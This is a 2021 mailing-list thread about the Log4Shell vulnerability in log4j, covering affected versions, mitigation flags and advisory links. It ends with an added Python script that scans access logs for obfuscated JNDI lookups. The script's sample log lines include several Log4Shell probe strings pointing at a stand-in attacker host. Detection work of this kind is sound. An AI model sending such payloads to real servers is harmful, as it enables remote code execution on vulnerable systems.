[aklug] [nuga] log4j trivial RCE (similar to ShellShock) - "Log4Shell" CVE-2021-44228

Royce Williams royce at tycho.org
Sun Dec 12 19:33:19 AKST 2021


Hi, Mike -

Good question. log4j 1.x is not vulnerable to the "Log4Shell" vulnerability
itself, per its author. However, it is vulnerable to a number of other
issues, and is no longer supported by the authors. So for any product with
1.x still integrated, those parent products' vendors should be asked
questions about upgrade plans.

-- 
Royce


On Sun, Dec 12, 2021 at 7:25 PM Mike <tibor at tibor.org> wrote:

> Royce,
>
> From what I've been seeing, only version 2.x seems to be vulnerable, and
> 1.x is not, however nothing seems to be certain about that.
>
> Have you seen any hard confirmation yet whether 1.x is vulnerable?
>
> Thanks,
> Mike
>
>
> On Fri, 10 Dec 2021, Royce Williams wrote:
>
> > This one is developing quickly, so I'll push updates here as I discover
> them:
> >
> https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
> >
> > --
> > Royce Williams
> > Tech Solvency
> >
> >
> > On Fri, Dec 10, 2021 at 7:21 AM Royce Williams <royce at techsolvency.com>
> wrote:
> > Summary (Dan Goodin):
> > Log4j takes a log message, interprets it as a URL and goes out and
> fetches it. It will even execute JavaScript in URLs
> > with full privileges of the main program. Exploits are triggered inside
> log messages using the ${} syntax. Easy peasy.
> >
> > Who is affected:
> > - Servers and clients that run Java and also log anything using the
> log4j framework
> > - log4j 2.x confirmed, and probably log4j 1.x also
> > - Don't forget appliances that use Java server components
> > - Downstream projects that include log4j, including Apache Struts, Solr,
> etc.
> >
> > Required to fully mitigate:
> > - Upgrade to Log4j 2.15.0
> > - requires Java 8
> >
> > Exploitation: active:
> > https://twitter.com/GreyNoiseIO/status/1469326260803416073
> >
> > Mitigations - easiest:
> > - (@MalwareTechBlog): If you can't upgrade log4j, you can mitigate the
> RCE vulnerability by setting
> > log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in
> JVM command line).
> >
> > Mitigations - official project itself (
> https://logging.apache.org/log4j/2.x/)
> > >Users of Log4j 2.10 or greater may add -Dlog4j.formatMsgNoLookups=true
> as a command line option or add
> > log4j.formatMsgNoLookups=true to a log4j2.component.properties file on
> the classpath to prevent lookups in log event
> > messages.
> > >Users since Log4j 2.7 may specify %m{nolookups} in the PatternLayout
> configuration to prevent lookups in log event
> > messages.
> > >Remove the JndiLookup and JndiManager classes from the log4j-core jar.
> Removal of the JndiManager will cause the
> > JndiContextSelector and JMSAppender to no longer function.
> >
> > Mitigations - harder:
> > - WAF to limit exploit queries
> > - egress filtering to block unexpected outbound traffic
> >
> > Exploit detection:
> > https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
> >
> > Good threads and summaries:
> > - https://twitter.com/GossiTheDog/status/1469248250670727169
> > -
> https://cert.at/de/warnungen/2021/12/kritische-0-day-sicherheitslucke-in-apache-log4j-bibliothek
> (German)
> > - https://github.com/YfryTchsGD/Log4jAttackSurface
> >
> > --
> > Royce Williams
> > Tech Solvency
> >
> >
> >
> >
>
>
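As an added example (this is not code from the original thread, nor from the Log4j project): the exploit-detection gist linked above boils down to grep patterns for the `${jndi:` lookup string in log files, and the simplest grep misses the obfuscated forms that were circulating within hours. The Python below first URL-decodes each line, then resolves the nested lookups the way Log4j's substitution would (`${lower:...}`, `${upper:...}`, and the `${key:-default}` fallback, which attackers abuse as `${::-j}` to spell out "jndi" one character at a time) and only then looks for a `jndi:` lookup and its protocol. The access-log lines and the `attacker.example` host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original thread): one benign
# request, the plain Log4Shell probe in the User-Agent field, two obfuscated
# variants, and one URL-encoded variant.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D"',
]

# A lookup with no further ${...} nested inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<protocol>:...} with any whitespace/case tricks.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(m):
    """Resolve one innermost lookup the way Log4j's StrSubstitutor would,
    for the lookups that can be evaluated offline; leave the rest as-is."""
    body = m.group(1)
    if ":-" in body:
        # ${key:-default} yields "default" when the key is absent; ${::-j} -> "j"
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.strip().lower() == "lower":
        return arg.lower()
    if sep and name.strip().lower() == "upper":
        return arg.upper()
    # jndi:, env:, sys:, date: ... cannot or should not be evaluated here
    return m.group(0)


def normalize(line, max_rounds=20):
    """URL-decode, then repeatedly collapse innermost lookups until the text
    stops changing (bounded, so a pathological line cannot spin forever)."""
    text = unquote(line)
    for _ in range(max_rounds):
        collapsed = _INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookup(line):
    """Return the protocol of a JNDI lookup found in the line (e.g. 'ldap',
    'rmi', 'dns'), or None if the line carries none."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """(1-based line number, protocol) for every line that carries a lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        proto = find_jndi_lookup(line)
        if proto:
            hits.append((number, proto))
    return hits


if __name__ == "__main__":
    for number, proto in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi lookup via {proto}")
```

Two caveats for anyone running this over real logs: a hit means somebody sent a probe, not that the host was exploited (the JVM must actually have logged the field with a vulnerable log4j-core for the lookup to fire), and the normalizer only models the lookups listed above, so payloads that build the string with other lookups, or that arrive in a field the application never logs, will not be caught. It is a hunting aid alongside the upgrade, not a substitute for it.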